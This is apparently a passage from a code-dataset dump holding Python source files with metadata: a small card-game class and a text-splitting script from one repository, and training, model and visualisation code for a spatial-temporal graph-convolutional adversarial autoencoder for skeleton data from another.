"text": "#!/usr/bin/python2\n# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4\nimport sys\n\n\nclass Card:\n manatypes = ['C', 'W', 'G', 'U', 'B', 'R', 'WG', 'WU', 'WB',\n 'WR', 'GU', 'GB', 'GR', 'BU', 'BR', 'UR']\n\n def __init__(self, attack, health, cost):\n self.attack, self.health = health, attack\n if self.isValidCost(cost):\n self.cost = cost\n else:\n None\n\n def getAttack(self):\n return self.attack\n\n def getHealth(self):\n return self.health\n\n def getCost(self):\n return self.cost\n\n def setAttack(attack):\n self.attack = attack\n\n def setHealth(health):\n self.health = health\n\n def setCost(cost):\n self.cost = cost\n\n def isValidCost(self, cost):\n return all(True for i in cost.keys() if i in self.manatypes)\n\n def printCost(self):\n return ''.join(\n [a * b if a != 'C' else str(b)\n for (a, b) in self.cost.items()])\n\n def printCard(self):\n print self.getAttack(), \"/\", self.getHealth(), \"for\",\n self.printCost(), \"mana\"\n\n\ndef main(args):\n testData = {'Attack': 2, 'Health': 3, 'Cost': {'U': 2, 'C': 2}}\n with open(args[1]) as infile:\n infile.read()\n testCard = Card(testData['Attack'], testData['Health'], testData['Cost'])\n testCard.printCard()\n\n\nif __name__ == '__main__':\n main(sys.argv)\n"
},
{
"alpha_fraction": 0.61583012342453,
"alphanum_fraction": 0.6254826188087463,
"avg_line_length": 29.47058868408203,
"blob_id": "13d59c349742494d6265b68535446fcc3f39e1b7",
"content_id": "2a2b505ab3d8e1fca4b8212af07e7f72aa185e5a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 518,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 17,
"path": "/dictionary.py",
"repo_name": "winnersguard/mtgpy",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python2\n# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4\nimport sys\n\ndef main( args ):\n with open(args[1], 'r') as infile:\n print gimmeKeys(infile.read())\ndef gimmeKeys( lists ):\n digList = [ d.strip() for d in lists if d.isdigit() ]\n letList = [ c.strip() for c in lists if c.isalpha() ]\n digCat = ''.join(digList)\n letCat = ''.join(letList)\n return({'Digit':digCat, 'Letter':letCat, 'DigitList':digList, 'LetterList':letList})\n\n\nif __name__ == '__main__':\n main(sys.argv)\n"
}
] | 4 |
lqjlqj1997/ST-AAE
|
https://github.com/lqjlqj1997/ST-AAE
|
afff414cf9b435f6fad6d84dc84a9b0a4c89fd8e
|
e1fc3b26f49469963cca84dafe9d35bf76d5e96c
|
65cb5bdade16772667e36b6380ec806411f8a686
|
refs/heads/master
| 2022-07-10T00:56:52.852070 | 2020-05-05T13:09:44 | 2020-05-05T13:09:44 | 255,847,798 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5354499816894531,
"alphanum_fraction": 0.5407058000564575,
"avg_line_length": 39.7117919921875,
"blob_id": "2912eb7c11468225eb6b2558c47f6784a4d0b801",
"content_id": "92c0ec9236201ab8e3886c5ce58c964bfd595c56",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9323,
"license_type": "permissive",
"max_line_length": 157,
"num_lines": 229,
"path": "/processor/processor.py",
"repo_name": "lqjlqj1997/ST-AAE",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# pylint: disable=W0201\nimport sys\n\nimport argparse\nimport yaml\nimport numpy as np\nimport datetime\nimport random\n\n# torch\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\n# torchlight\nimport torchlight\nfrom torchlight import str2bool\nfrom torchlight import DictAction\nfrom torchlight import import_class\nimport os\nprint(os.getcwd())\nfrom .base import IO\n\nclass Processor(IO):\n \"\"\"\n Base ProcessorF\n \"\"\"\n\n def __init__(self, argv=None):\n\n self.load_arg(argv)\n self.init_environment()\n self.init_seed()\n self.load_model()\n self.load_weights()\n self.gpu()\n self.load_data()\n self.load_optimizer()\n\n def init_environment(self):\n\n super().init_environment()\n self.result = dict()\n self.iter_info = dict()\n self.epoch_info = dict()\n self.meta_info = dict(epoch=0, iter=0)\n self.seed = self.arg.seed\n\n def init_seed(self):\n if(self.seed is not None):\n torch.cuda.manual_seed_all(self.seed)\n torch.manual_seed(self.seed)\n np.random.seed(self.seed)\n random.seed(self.seed)\n\n def load_optimizer(self):\n pass\n\n def load_data(self):\n Feeder = import_class(self.arg.feeder)\n \n if 'debug' not in self.arg.train_feeder_args:\n self.arg.train_feeder_args['debug'] = self.arg.debug\n \n self.data_loader = dict()\n \n if self.arg.phase == 'train':\n self.data_loader['train'] = torch.utils.data.DataLoader(\n dataset = Feeder(**self.arg.train_feeder_args),\n batch_size = self.arg.batch_size,\n shuffle = True,\n num_workers = self.arg.num_worker * torchlight.ngpu(self.arg.device),\n drop_last = True\n )\n\n if self.arg.test_feeder_args:\n self.data_loader['test'] = torch.utils.data.DataLoader(\n dataset = Feeder(**self.arg.test_feeder_args),\n batch_size = self.arg.test_batch_size,\n shuffle = False,\n num_workers = self.arg.num_worker * torchlight.ngpu(self.arg.device)\n )\n\n def show_epoch_info(self):\n \n for k, v in self.epoch_info.items():\n self.io.print_log('\\t{}: {}'.format(k, v))\n \n if(self.arg.pavi_log):\n self.io.log('train', self.meta_info['iter'], self.epoch_info)\n\n def show_iter_info(self):\n\n if(self.meta_info['iter'] % self.arg.log_interval == 0):\n info ='\\tIter {} Done.'.format(self.meta_info['iter'])\n \n for k, v in self.iter_info.items():\n \n if( isinstance(v, float)):\n info = info + ' | {}: {:.4f}'.format(k, v)\n \n else:\n info = info + ' | {}: {}'.format(k, v)\n\n self.io.print_log(info)\n\n if self.arg.pavi_log:\n self.io.log('train', self.meta_info['iter'], self.iter_info)\n\n def train(self):\n\n for _ in range(100):\n self.iter_info['loss'] = 0\n self.show_iter_info()\n self.meta_info['iter'] += 1\n \n self.epoch_info['mean loss'] = 0\n self.show_epoch_info()\n\n def test(self):\n \n for _ in range(100):\n self.iter_info['loss'] = 1\n self.show_iter_info()\n \n self.epoch_info['mean loss'] = 1\n self.show_epoch_info()\n\n def start(self):\n self.io.print_log('Parameters:\\n{}\\n'.format(str(vars(self.arg))))\n\n # training phase\n if(self.arg.phase == 'train'):\n \n for epoch in range(self.arg.start_epoch, self.arg.num_epoch):\n self.meta_info['epoch'] = epoch\n\n # training\n self.io.print_log('Training epoch: {}'.format(epoch))\n self.train()\n self.io.print_log('Done.')\n\n # save model\n if ((epoch + 1) % self.arg.save_interval == 0) or (\n epoch + 1 == self.arg.num_epoch):\n date_time = datetime.datetime.now().strftime(\"%Y_%m_%d/\")\n filename = date_time + 'epoch{}_model.pt'.format(epoch + 1)\n \n if(not os.path.exists(self.io.work_dir + \"/\" + date_time)):\n 
os.makedirs(self.io.work_dir + \"/\" + date_time)\n \n self.io.save_model(self.model, filename)\n\n # evaluation\n if ((epoch + 1) % self.arg.eval_interval == 0) or (\n epoch + 1 == self.arg.num_epoch):\n self.io.print_log('Eval epoch: {}'.format(epoch))\n self.test()\n self.io.print_log('Done.')\n # test phase\n elif(self.arg.phase == 'test'):\n\n # the path of weights must be appointed\n if self.arg.weights is None:\n raise ValueError('Please appoint --weights.')\n \n self.io.print_log('Model: {}.'.format(self.arg.model))\n self.io.print_log('Weights: {}.'.format(self.arg.weights))\n\n # evaluation\n self.io.print_log('Evaluation Start:')\n self.test()\n self.io.print_log('Done.\\n')\n\n # save the output of model\n if(self.arg.save_result):\n result_dict = dict(\n zip(self.data_loader['test'].dataset.sample_name,\n self.result))\n \n self.io.save_pkl(result_dict, 'test_result.pkl')\n\n @staticmethod\n def get_parser(add_help=False):\n\n #region arguments yapf: disable\n # parameter priority: command line > config > default\n parser = argparse.ArgumentParser( add_help=add_help, description='Base Processor')\n\n parser.add_argument('-w', '--work_dir', default= './work_dir/tmp', help= 'the work folder for storing results')\n parser.add_argument('-c', '--config' , default= None , help= 'path to the configuration file')\n\n # processor\n parser.add_argument('--phase' , default= 'train', help= 'must be train or test')\n parser.add_argument('--save_result', type= str2bool, default= True , help= 'if ture, the output of the model will be stored')\n parser.add_argument('--start_epoch', type= int , default= 0 , help= 'start training from which epoch')\n parser.add_argument('--num_epoch' , type= int , default= 80 , help= 'stop training in which epoch')\n parser.add_argument('--use_gpu' , type= str2bool, default= True , help= 'use GPUs or not')\n parser.add_argument('--device' , type= int , default= 0, nargs='+', help= 'the indexes of GPUs for training or testing')\n\n # visulize and debug\n parser.add_argument('--seed' , type= int , default= None , help= 'the seed for random generator')\n parser.add_argument('--log_interval' , type= int , default= 100 , help= 'the interval for printing messages (#iteration)')\n parser.add_argument('--save_interval', type= int , default= 10 , help= 'the interval for storing models (#iteration)')\n parser.add_argument('--eval_interval', type= int , default= 5 , help= 'the interval for evaluating models (#iteration)')\n parser.add_argument('--save_log' , type= str2bool, default= True , help= 'save logging or not')\n parser.add_argument('--print_log' , type= str2bool, default= True , help= 'print logging or not')\n parser.add_argument('--pavi_log' , type= str2bool, default= False, help= 'logging on pavi or not')\n\n # feeder\n parser.add_argument('--feeder' , default= 'feeder.feeder', help='data loader will be used')\n parser.add_argument('--num_worker' , type= int, default= 4 , help='the number of worker per gpu for data loader')\n parser.add_argument('--train_feeder_args', action= DictAction, default= dict(), help='the arguments of data loader for training')\n parser.add_argument('--test_feeder_args' , action= DictAction, default= dict(), help='the arguments of data loader for test')\n parser.add_argument('--batch_size' , type= int, default= 256 , help='training batch size')\n parser.add_argument('--test_batch_size' , type= int, default= 256 , help='test batch size')\n \n parser.add_argument('--debug', action= \"store_true\" , help= 'less data, faster loading')\n\n # 
model\n parser.add_argument('--model' , default= None , help= 'the model will be used')\n parser.add_argument('--model_args', action= DictAction, default= dict(), help= 'the arguments of model')\n parser.add_argument('--weights' , default= None , help= 'the weights for network initialization')\n \n parser.add_argument('--ignore_weights', type= str , default= [], nargs= '+', help= 'the name of weights which will be ignored in the initialization')\n #endregion yapf: enable\n\n return parser\n"
},
{
"alpha_fraction": 0.7352941036224365,
"alphanum_fraction": 0.8039215803146362,
"avg_line_length": 9.300000190734863,
"blob_id": "0a17b82a0546ba5ebbf807d91d3dbb085a9175db",
"content_id": "b8efb3a90ad9f54b72ca2ba4b14c4a0398d3a448",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 102,
"license_type": "permissive",
"max_line_length": 18,
"num_lines": 10,
"path": "/requirements.txt",
"repo_name": "lqjlqj1997/ST-AAE",
"src_encoding": "UTF-8",
"text": "pyyaml\nargparse\nnumpy\nh5py\nopencv-python\nimageio\nscikit-video\ntorch==1.4.0 \ntorchvision==0.5.0\nsklearn"
},
{
"alpha_fraction": 0.4304908215999603,
"alphanum_fraction": 0.4729914963245392,
"avg_line_length": 30.98245620727539,
"blob_id": "ad2b40f886d30566939a0d7fb0317f0884fb439c",
"content_id": "22ba150dc74da4834c7a033da4dfca10831b5e24",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3647,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 114,
"path": "/display_data.py",
"repo_name": "lqjlqj1997/ST-AAE",
"src_encoding": "UTF-8",
"text": "import sys\nimport os\nimport numpy as np\nimport argparse\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\ndef str2bool(v):\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')\n\ndef display_skeleton(data,sample_name,save=False):\n \n data = data.reshape((1,) + data.shape)\n\n N, C, T, V, M = data.shape\n\n plt.ion()\n fig = plt.figure()\n mng = plt.get_current_fig_manager()\n \n ax = fig.add_subplot(111, projection='3d')\n \n p_type = ['b-', 'g-', 'r-', 'c-', ' m-', 'y-', 'k-', 'k-', 'k-', 'k-']\n edge = [(1, 2) ,(2, 21) ,(3, 21) ,(4, 3) ,(5, 21) ,(6, 5) , \n (7, 6) ,(8, 7) ,(9, 21) ,(10, 9) ,(11, 10) ,(12, 11) ,\n (13, 1) ,(14, 13) ,(15, 14) ,(16, 15) ,(17, 1) ,(18, 17) ,\n (19, 18),(20, 19) ,(22, 23) ,(23, 8) ,(24, 25) ,(25, 12) ]\n \n edge = [(i-1,j-1) for (i,j) in edge]\n pose = []\n\n for m in range(M):\n a = []\n for i in range(len(edge)):\n a.append(ax.plot(np.zeros(3), np.zeros(3), p_type[m])[0])\n \n pose.append(a)\n\n \n\n ax.axis([-1, 1, -1, 1])\n ax.set_zlim3d(-1, 1)\n ax.view_init(elev=15, azim=45)\n\n if (save is True):\n if not os.path.exists('./image/'+str(sample_name)+\"/\"):\n os.makedirs('./image/'+str(sample_name)+\"/\")\n \n for t in range(T):\n for m in range(M):\n\n for i, (v1, v2) in enumerate(edge):\n x1 = data[0, :2, t, v1, m]#.around(decimals=2)\n x2 = data[0, :2, t, v2, m]\n # print(data[0, 0, t, [v1, v2], m])\n # print(data[0, 1, t, [v1, v2], m])\n \n if (x1.sum() != 0 and x2.sum() != 0) or v1 == 1 or v2 == 1 :\n pose[m][i].set_xdata(data[0, 0, t, [v1, v2], m])\n pose[m][i].set_ydata(data[0, 1, t, [v1, v2], m])\n pose[m][i].set_3d_properties([data[0, 2, t, v1, m],data[0, 2, t, v2, m]]) \n \n \n fig.suptitle('T = {}'.format(t), fontsize=16) \n fig.canvas.draw()\n \n \n if (save is True):\n plt.savefig('./image/'+str(sample_name)+\"/\" + str(t) + '.png')\n\n plt.pause(1/240)\n plt.close(fig)\n\nif __name__ == \"__main__\":\n \n parser = argparse.ArgumentParser( add_help=True, description='Display Skeleton')\n\n parser.add_argument('--data' ,default= \"\" , help='path with the orignal data')\n parser.add_argument('--recon',default= \"\" , help='path of reconstructed data')\n parser.add_argument('--save' ,type= str2bool ,default= False , help='save Figure of skeleton')\n \n arg = parser.parse_args()\n \n data_disp = False\n recon_disp = False\n \n if(os.path.exists(arg.data)) :\n data = np.load(arg.data)\n data_disp = True\n else:\n print(\"Invalid or No Path of data is provided\")\n\n if(os.path.exists(arg.recon)) :\n recon_data = np.load(arg.recon)\n recon_disp = True\n else:\n print(\"Invalid or No Path of reconstructed data is provided\")\n \n\n if(data_disp or recon_disp):\n for i in range(32):\n print(\"====== data {} =======\".format(i))\n \n if(data_disp):\n display_skeleton(data[i] ,\"original_{}\".format(i), save= arg.save)\n \n if(recon_disp):\n display_skeleton(recon_data[i],\"recon_{}\".format(i), save= arg.save)\n\n"
},
{
"alpha_fraction": 0.48991936445236206,
"alphanum_fraction": 0.5161290168762207,
"avg_line_length": 25.157894134521484,
"blob_id": "31467efb23aa3810b277ef12b1e725cd8e0308ec",
"content_id": "e9e68cac9ab695d15f7aa75f0f6031518bb34709",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 496,
"license_type": "permissive",
"max_line_length": 45,
"num_lines": 19,
"path": "/net/subnet/discriminator.py",
"repo_name": "lqjlqj1997/ST-AAE",
"src_encoding": "UTF-8",
"text": "from torch import nn\n\nclass Discriminator(nn.Module):\n\n def __init__(self, latent_dim):\n super(Discriminator, self).__init__()\n\n self.model = nn.Sequential(\n nn.Linear (latent_dim, 64),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear (64 , 32),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear (32 , 1),\n nn.Sigmoid (),\n )\n\n def forward(self, z):\n validity = self.model(z)\n return validity"
},
{
"alpha_fraction": 0.4932543635368347,
"alphanum_fraction": 0.5098168253898621,
"avg_line_length": 29.28903579711914,
"blob_id": "2ac8561d163586fe0550e34d878b787b6c905872",
"content_id": "e46f588d83eb4dc56804801d774d00f08619f77d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9117,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 301,
"path": "/net/ST_AAE.py",
"repo_name": "lqjlqj1997/ST-AAE",
"src_encoding": "UTF-8",
"text": "import sys\nsys.path.extend(['../'])\n\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom net.utils.graph import Graph\nfrom net.subnet.st_gcn import *\nfrom net.subnet.discriminator import Discriminator\n\n\nclass ST_AAE(nn.Module):\n\n def __init__(self, in_channels, T, V, num_class, graph_args,\n edge_importance_weighting=False, **kwargs):\n\n super().__init__()\n temporal_kernel_size= [299,299]\n \n self.T = T\n self.V = V\n self.num_class = num_class\n\n self.encoder = Encoder( in_channels, num_class, \n graph_args , edge_importance_weighting,\n temporal_kernel_size[0]\n )\n self.decoder = Decoder( in_channels, num_class, self.T, self.V, \n graph_args , edge_importance_weighting,\n temporal_kernel_size[1]\n )\n \n self.y_discriminator = Discriminator(num_class)\n self.z_discriminator = Discriminator(num_class)\n\n def forward(self, x ):\n\n N,C,T,V,M = x.size()\n \n # encoder\n cat_y, latent_z = self.encoder(x)\n\n # Catogerise \n cat_y = F.softmax( cat_y , dim=1 )\n\n # Reparameter\n z = self.reparameter(cat_y.view(N,-1,1).repeat(1,1,M).permute(0,2,1).contiguous().view(N*M,-1), latent_z)\n z = z.view(N, M, -1)\n \n\n recon_x = self.decoder(z)\n\n return recon_x, cat_y, latent_z, z\n \n \n def reparameter(self, mean, logvar):\n\n std = torch.exp(0.5 * logvar) \n eps = torch.randn_like(logvar)\n\n return mean + eps*std\n\n def inference(self, n=1, class_label = [0] ):\n \n batch_size = n\n\n z = torch.tensor(np.random.normal(0, 1, (batch_size, self.num_class )))\n \n if(self.is_cuda):\n z = z.cuda()\n \n recon_x = self.decoder(z)\n\n return recon_x\n\n\nclass Encoder(nn.Module):\n r\"\"\"Spatial temporal graph convolutional networks.\n\n Args:\n in_channels (int): Number of channels in the input data\n num_class (int): Number of classes for the classification task\n graph_args (dict): The arguments for building the graph\n edge_importance_weighting (bool): If ``True``, adds a learnable\n importance weighting to the edges of the graph\n **kwargs (optional): Other parameters for graph convolution units\n\n Shape:\n - Input: :math:`(N, in_channels, T_{in}, V_{in}, M_{in})`\n - Output: :math:`(N, num_class)` where\n :math:`N` is a batch size,\n :math:`T_{in}` is a length of input sequence,\n :math:`V_{in}` is the number of graph nodes,\n :math:`M_{in}` is the number of instance in a frame.\n \"\"\"\n\n def __init__(self, in_channels, num_class, graph_args,\n edge_importance_weighting = False, \n temporal_kernel_size = 9, **kwargs):\n \n super().__init__()\n\n # load graph\n self.graph = Graph(**graph_args)\n A = torch.tensor(self.graph.A, dtype = torch.float32, \n requires_grad = False)\n \n self.register_buffer('A', A)\n\n # build networks\n spatial_kernel_size = A.size(0)\n kernel_size = (temporal_kernel_size, spatial_kernel_size)\n\n self.data_bn = nn.BatchNorm1d(in_channels * A.size(1))\n\n self.encoder = nn.ModuleList((\n st_gcn(in_channels , 64 , kernel_size, 1, **kwargs),\n st_gcn(64 , 128 , kernel_size, 1, **kwargs),\n st_gcn(128 , 128 , kernel_size, 1, **kwargs)\n \n ))\n\n # initialize parameters for edge importance weighting\n if edge_importance_weighting:\n self.edge_importance = nn.ParameterList([\n nn.Parameter(torch.ones(self.A.size()))\n for i in self.encoder\n ])\n else:\n self.edge_importance = [1] * len(self.encoder)\n\n # fcn for encoding\n self.z_mean = nn.Conv2d(128, num_class, kernel_size=1)\n self.z_logvar = nn.Conv2d(128, num_class, kernel_size=1)\n\n def forward(self, x):\n N, C, T, V, M = x.size()\n \n 
#Data Norm\n x = x.permute(0, 4, 3, 1, 2).contiguous()\n x = x.view(N * M, V * C, T)\n x = self.data_bn(x)\n \n x = x.view(N, M, V, C, T)\n x = x.permute(0, 1, 3, 4, 2).contiguous()\n x = x.view(N * M, C, T, V)\n\n \n # forward\n for gcn, importance in zip(self.encoder, self.edge_importance):\n x, _ = gcn(x, self.A * importance)\n\n # global pooling\n x = F.avg_pool2d(x, x.size()[2:])\n \n # prediction\n mean = x.view(N, M, -1, 1 ,1).mean(dim = 1)\n \n mean = self.z_mean(mean)\n mean = mean.view(mean.size(0), -1)\n\n #latent value\n logvar = x.view(N*M, -1, 1, 1)\n \n logvar = self.z_logvar(logvar)\n logvar = logvar.view(logvar.size(0), -1)\n\n return mean, logvar\n\n\nclass Decoder(nn.Module):\n r\"\"\"Spatial temporal graph convolutional networks.\n\n Args:\n in_channels (int): Number of channels in the input data\n num_class (int): Number of classes for the classification task\n graph_args (dict): The arguments for building the graph\n edge_importance_weighting (bool): If ``True``, adds a learnable\n importance weighting to the edges of the graph\n **kwargs (optional): Other parameters for graph convolution units\n\n Shape:\n - Input: :math:`(N, in_channels, T_{in}, V_{in}, M_{in})`\n - Output: :math:`(N, num_class)` where\n :math:`N` is a batch size,\n :math:`T_{in}` is a length of input sequence,\n :math:`V_{in}` is the number of graph nodes,\n :math:`M_{in}` is the number of instance in a frame.\n \"\"\"\n\n def __init__(self, in_channels, num_class, T, V, \n graph_args, edge_importance_weighting = False, \n temporal_kernel_size = 9, **kwargs):\n \n super().__init__()\n\n # load graph\n self.graph = Graph(**graph_args)\n A = torch.tensor(self.graph.A, dtype = torch.float32, \n requires_grad = False)\n \n self.register_buffer('A', A)\n\n # build networks \n spatial_kernel_size = A.size(0)\n kernel_size = (temporal_kernel_size, spatial_kernel_size)\n\n\n self.fcn = nn.Sequential( \n nn.BatchNorm2d(num_class),\n nn.ConvTranspose2d(num_class, 128, kernel_size=(T,V)) ,\n nn.BatchNorm2d(128)\n )\n\n self.decoder = nn.ModuleList((\n st_gctn(128 , 128 , kernel_size, 1, **kwargs),\n st_gctn(128 , 64 , kernel_size, 1, **kwargs),\n st_gctn(64 , in_channels, kernel_size, 1, ** kwargs)\n ))\n\n # initialize parameters for edge importance weighting\n if edge_importance_weighting:\n self.edge_importance = nn.ParameterList([\n nn.Parameter(torch.ones(self.A.size()))\n for i in self.decoder\n ])\n else:\n self.edge_importance = [1] * len(self.decoder)\n\n #ouput Norm\n self.data_bn = nn.BatchNorm1d(in_channels * A.size(1))\n self.out = nn.Tanh()\n \n def forward(self, z):\n\n N,M,_ = z.size()\n\n z = z.view( N * M, -1, 1, 1 )\n \n # Deconvo spatial temporal\n z = self.fcn(z)\n \n _,C,T, V = z.size()\n\n\n # Deconvolution forward\n for gcn, importance in zip(self.decoder, self.edge_importance):\n z, _ = gcn(z, self.A * importance)\n\n # data normalization \n _, C, T, V, = z.size()\n \n # output norm\n z = z.view(N, M, C, T, V ).contiguous()\n z = z.permute(0, 1, 4, 2, 3).contiguous()\n\n z = z.view(N * M, V * C, T)\n z = self.data_bn(z)\n z = z.view(N, M, V, C, T)\n \n z = z.permute(0, 3, 4, 2, 1).contiguous()\n # z = self.out(z)\n\n return z\n\n\nif __name__ == '__main__':\n \n x=torch.randn(36,3,300,25,2).cuda()\n \n N, C, T, V, M = x.size()\n\n graph_args = {\"layout\":'ntu-rgb+d','strategy': \"uniform\"}\n \n m = CVAE(in_channels = 3, T = T, V = V, n_z = 32, \n graph_args = graph_args,\n edge_importance_weighting = True \n ).cuda()\n \n optimizer = torch.optim.SGD(m.parameters(), lr=0.01, 
momentum=0.9)\n lossF = nn.MSELoss()\n \n for i in range(10000):\n\n recon_x, mean, lsig, z = m(x)\n \n optimizer.zero_grad()\n loss = lossF(x, recon_x) \n \n optimizer.step()\n if (i % 100)==0:\n print(i,\" : \", loss.item())\n\n print(recon_x.shape)\n print(mean.shape)\n print(lsig.shape)\n print(z.shape)\n print(lossF(x, recon_x ))\n"
},
{
"alpha_fraction": 0.5160506963729858,
"alphanum_fraction": 0.5264618992805481,
"avg_line_length": 33.29166793823242,
"blob_id": "745f1f5a744df5561d77ebade87aee6dc3be119e",
"content_id": "f62e309486eb6fe31b4b7319f33b6bf0d53d8f08",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5763,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 168,
"path": "/net/subnet/st_gcn.py",
"repo_name": "lqjlqj1997/ST-AAE",
"src_encoding": "UTF-8",
"text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\nfrom net.subnet.tgcn import *\nfrom net.utils.graph import Graph\n\nclass st_gcn(nn.Module):\n r\"\"\"Applies a spatial temporal graph convolution over an input graph sequence.\n Args:\n in_channels (int): Number of channels in the input sequence data\n out_channels (int): Number of channels produced by the convolution\n kernel_size (tuple): Size of the temporal convolving kernel and graph convolving kernel\n stride (int, optional): Stride of the temporal convolution. Default: 1\n dropout (int, optional): Dropout rate of the final output. Default: 0\n residual (bool, optional): If ``True``, applies a residual mechanism. Default: ``True``\n\n Shape:\n - Input[0]: Input graph sequence in :math:`(N, in_channels, T_{in}, V)` format\n - Input[1]: Input graph adjacency matrix in :math:`(K, V, V)` format\n - Output[0]: Outpu graph sequence in :math:`(N, out_channels, T_{out}, V)` format\n - Output[1]: Graph adjacency matrix for output data in :math:`(K, V, V)` format\n\n where\n :math:`N` is a batch size,\n :math:`K` is the spatial kernel size, as :math:`K == kernel_size[1]`,\n :math:`T_{in}/T_{out}` is a length of input/output sequence,\n :math:`V` is the number of graph nodes.\n\n \"\"\"\n\n def __init__(self,\n in_channels,\n out_channels,\n kernel_size,\n stride=1,\n dropout=0,\n residual=True):\n super().__init__()\n\n assert len(kernel_size) == 2\n assert kernel_size[0] % 2 == 1\n padding = ((kernel_size[0] - 1) // 2, 0)\n\n self.gcn = ConvTemporalGraphical(in_channels, out_channels,\n kernel_size[1])\n\n self.tcn = nn.Sequential(\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True),\n nn.Conv2d(\n out_channels,\n out_channels,\n (kernel_size[0], 1),\n (stride, 1),\n padding,\n ),\n nn.BatchNorm2d(out_channels),\n nn.Dropout(dropout, inplace=True),\n )\n\n if not residual:\n self.residual = lambda x: 0\n\n elif (in_channels == out_channels) and (stride == 1):\n self.residual = lambda x: x\n\n else:\n self.residual = nn.Sequential(\n nn.Conv2d(\n in_channels,\n out_channels,\n kernel_size=1,\n stride=(stride, 1)),\n nn.BatchNorm2d(out_channels),\n )\n\n self.relu = nn.ReLU(inplace=True)\n\n def forward(self, x, A):\n\n res = self.residual(x)\n x, A = self.gcn(x, A)\n x = self.tcn(x) + res\n\n return self.relu(x), A\n\n\nclass st_gctn(nn.Module):\n r\"\"\"Applies a spatial temporal graph convolution over an input graph sequence.\n Args:\n in_channels (int): Number of channels in the input sequence data\n out_channels (int): Number of channels produced by the convolution\n kernel_size (tuple): Size of the temporal convolving kernel and graph convolving kernel\n stride (int, optional): Stride of the temporal convolution. Default: 1\n dropout (int, optional): Dropout rate of the final output. Default: 0\n residual (bool, optional): If ``True``, applies a residual mechanism. 
Default: ``True``\n\n Shape:\n - Input[0]: Input graph sequence in :math:`(N, in_channels, T_{in}, V)` format\n - Input[1]: Input graph adjacency matrix in :math:`(K, V, V)` format\n - Output[0]: Outpu graph sequence in :math:`(N, out_channels, T_{out}, V)` format\n - Output[1]: Graph adjacency matrix for output data in :math:`(K, V, V)` format\n\n where\n :math:`N` is a batch size,\n :math:`K` is the spatial kernel size, as :math:`K == kernel_size[1]`,\n :math:`T_{in}/T_{out}` is a length of input/output sequence,\n :math:`V` is the number of graph nodes.\n\n \"\"\"\n\n def __init__(self,\n in_channels,\n out_channels,\n kernel_size,\n stride=1,\n dropout=0,\n residual=True):\n super().__init__()\n\n assert len(kernel_size) == 2\n assert kernel_size[0] % 2 == 1\n padding = ((kernel_size[0] - 1) // 2, 0)\n\n self.gctn = ConvTransposeTemporalGraphical(in_channels, out_channels,\n kernel_size[1])\n\n self.tcn = nn.Sequential(\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(\n out_channels,\n out_channels,\n (kernel_size[0], 1),\n (stride, 1),\n padding,\n ),\n nn.BatchNorm2d(out_channels),\n nn.Dropout(dropout, inplace=True),\n )\n\n if not residual:\n self.residual = lambda x: 0\n\n elif (in_channels == out_channels) and (stride == 1):\n self.residual = lambda x: x\n\n else:\n self.residual = nn.Sequential(\n nn.ConvTranspose2d(\n in_channels,\n out_channels,\n kernel_size=1,\n stride=(stride, 1)),\n nn.BatchNorm2d(out_channels),\n )\n\n self.relu = nn.ReLU(inplace=True)\n\n def forward(self, x, A):\n\n res = self.residual(x)\n x, A = self.gctn(x, A)\n x = self.tcn(x) + res\n\n return self.relu(x), A\n\n\n"
},
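The temporal branch of the st_gcn block above keeps the frame dimension unchanged when stride=1, because its padding is set to (kernel_size[0] - 1) // 2. A minimal sketch of that shape arithmetic, assuming only PyTorch is installed (the tensor sizes are made up for illustration):

```python
import torch
import torch.nn as nn

N, C, T, V = 8, 64, 50, 25            # batch, channels, frames, graph nodes (illustrative)
k = 9                                  # temporal kernel size; the block asserts it is odd
padding = ((k - 1) // 2, 0)            # same padding rule as in st_gcn.__init__

tcn = nn.Conv2d(C, C, (k, 1), stride=(1, 1), padding=padding)
x = torch.randn(N, C, T, V)
print(tcn(x).shape)                    # torch.Size([8, 64, 50, 25]) -- T and V preserved
```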
{
"alpha_fraction": 0.6307228803634644,
"alphanum_fraction": 0.6427710652351379,
"avg_line_length": 48.55223846435547,
"blob_id": "6fd340e93e0cec0abfde4b3a0d29c6d066daf04b",
"content_id": "8c0423322815ce1f2a12e07b89347770fafde36b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3320,
"license_type": "permissive",
"max_line_length": 210,
"num_lines": 67,
"path": "/README.md",
"repo_name": "lqjlqj1997/ST-AAE",
"src_encoding": "UTF-8",
